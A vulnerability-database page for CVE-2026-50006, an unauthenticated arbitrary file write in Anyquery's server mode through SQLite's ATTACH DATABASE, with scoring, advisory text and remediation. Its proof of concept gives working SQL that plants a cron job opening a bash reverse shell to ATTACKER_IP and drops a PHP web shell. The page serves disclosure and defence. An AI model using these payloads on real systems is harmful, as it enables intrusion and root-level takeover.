CVE-2026-50006

CRITICALPre-NVD 9.19.1
EchelonGraph scoreHIGH confidence

Score 9.1 from GitHub Security Advisory (severity: CRITICAL) published 2026-07-14. the CNA's CVSS baseline 9.1; sources differ by 0.0.

Triggered by: GitHub Security Advisory CVSS
Sources: cna:github_m, ghsa
9.1
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: CVSS: 9.1Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Anyquery: Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) via Unrestricted ATTACH DATABASE in Server Mode

Summary

Anyquery's server mode does not disable or restrict native SQLite disk manipulation commands. Unauthenticated attackers connecting to the MySQL-compatible server port can use the ATTACH DATABASE command to write arbitrary SQLite databases to any path on the victim's filesystem where the process has write permissions. This leads to Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) depending on the environment (e.g., by dropping a PHP web shell if a web server is running, or overwriting system cronjobs if running as root).

Details

When Anyquery is launched in Server Mode (anyquery server), it blindly proxies incoming SQL commands to the underlying SQLite engine. SQLite allows dynamic database mounting via the ATTACH DATABASE command, which creates a physical .db file on the filesystem if the file does not exist.

An attacker can connect to the open Anyquery port, attach a new database to a sensitive path (e.g., /var/www/html/shell.php, /etc/cron.d/pwn or /root/.ssh/authorized_keys), create a table, and insert a malicious payload. Although the file will contain a binary SQLite header, standard Linux services like cron, sshd, and web servers like PHP tolerate garbage data and will parse/execute the valid payload lines injected by the attacker.

PoC (Proof of Concept)

  • Start the server on the victim machine:
anyquery server --host 0.0.0.0 --port 8070
  • Connect from an attacker machine:
mysql -u root -h  -P 8070
  • Execute the payload to write a malicious cronjob for native RCE (Note: the Anyquery process must have write permissions to the target directory, such as /etc/cron.d or /var/spool/cron/crontabs/):
ATTACH DATABASE '/etc/cron.d/pwn' AS pwn;
   CREATE TABLE pwn.task (cmd TEXT);
   INSERT INTO pwn.task VALUES ('* * * * * root /bin/bash -c "bash -i >& /dev/tcp/ATTACKER_IP/1337 0>&1"');

*Alternatively, if a web server is running and the Anyquery process can write to the web root, you can drop a PHP shell:*

ATTACH DATABASE '/var/www/html/shell.php' AS pwn;
   CREATE TABLE pwn.hacked (cmd TEXT);
   INSERT INTO pwn.hacked VALUES ('<?php system($_GET["cmd"]); ?>');

*If testing locally as a non-root user, you can verify the vulnerability by writing to /tmp:*

ATTACH DATABASE '/tmp/pwn.db' AS pwn;
   CREATE TABLE pwn.test (cmd TEXT);
   INSERT INTO pwn.test VALUES ('Hello Anyquery AFW');
Within 60 seconds, the system's cron daemon will ignore the SQLite header, parse the valid cron string, and execute the reverse shell payload with root privileges.

Impact

  • Confidentiality: None (from the write action itself, though combined with LFR it becomes High).
  • Integrity: High. Arbitrary files can be written or overwritten, which corrupts the filesystem.
  • Availability: High. Overwriting critical system files (e.g., configurations, databases) can lead to complete Denial of Service (DoS).
  • CVSS Score: 9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
  • *Note: If the process is running with elevated privileges (e.g., root) or inside a web root directory, this escalates to Remote Code Execution (RCE) with a CVSS of 9.8 (Critical).*

Remediation

Disable dangerous SQLite functions (ATTACH DATABASE, DETACH DATABASE, etc.) when running in Server Mode. Restrict the MySQL handler so that it only permits operations on the main database or in-memory virtual tables.

CVSS v3
9.1
EG Score
9.1(high)
EPSS
KEV
Not listed

Published

July 14, 2026

Last Modified

July 14, 2026

Vendor Advisories for CVE-2026-50006(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Patch Availability(1)

Vendor / EcosystemFixed in / PatchReleasedSource
gogithub.com/julien040/anyqueryghsa

Patches are aggregated from vendor advisories (Red Hat, Microsoft, Cisco, GitHub) and package ecosystems (OSV, GHSA). Multiple rows for the same upstream release have been deduplicated.

Weakness Classification(5)

MITRE Common Weakness Enumeration — the root-cause categories this CVE belongs to.

Data Freshness Timeline

(refreshed 10× in last 7d / 10× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-15 10:05 UTCEG score recompute
  2. 2026-07-15 10:05 UTCGHSA enrichment
  3. 2026-07-15 06:19 UTCEG score recompute
  4. 2026-07-15 06:19 UTCGHSA enrichment
  5. 2026-07-15 02:32 UTCEG score recompute
  6. 2026-07-15 02:32 UTCGHSA enrichment
  7. 2026-07-14 22:44 UTCEG score recompute
  8. 2026-07-14 22:44 UTCGHSA enrichment
  9. 2026-07-14 18:57 UTCEG score recompute
  10. 2026-07-14 18:56 UTCGHSA enrichment

Frequently asked(4)

What is CVE-2026-50006?
CVE-2026-50006 is a critical vulnerability published on July 14, 2026. Anyquery: Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) via Unrestricted ATTACH DATABASE in Server Mode Summary Anyquery's server mode does not disable or restrict native SQLite disk manipulation commands. Unauthenticated attackers connecting to the MySQL-compatible…
When was CVE-2026-50006 disclosed?
CVE-2026-50006 was first published in the National Vulnerability Database on July 14, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-50006?
CVE-2026-50006 has a CVSS v4.0 base score of 9.1 (CNA self-assessment; NVD's own analysis pending).
How do I remediate CVE-2026-50006?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-50006, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-50006

Explore →

Is Your Infrastructure Affected by CVE-2026-50006?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.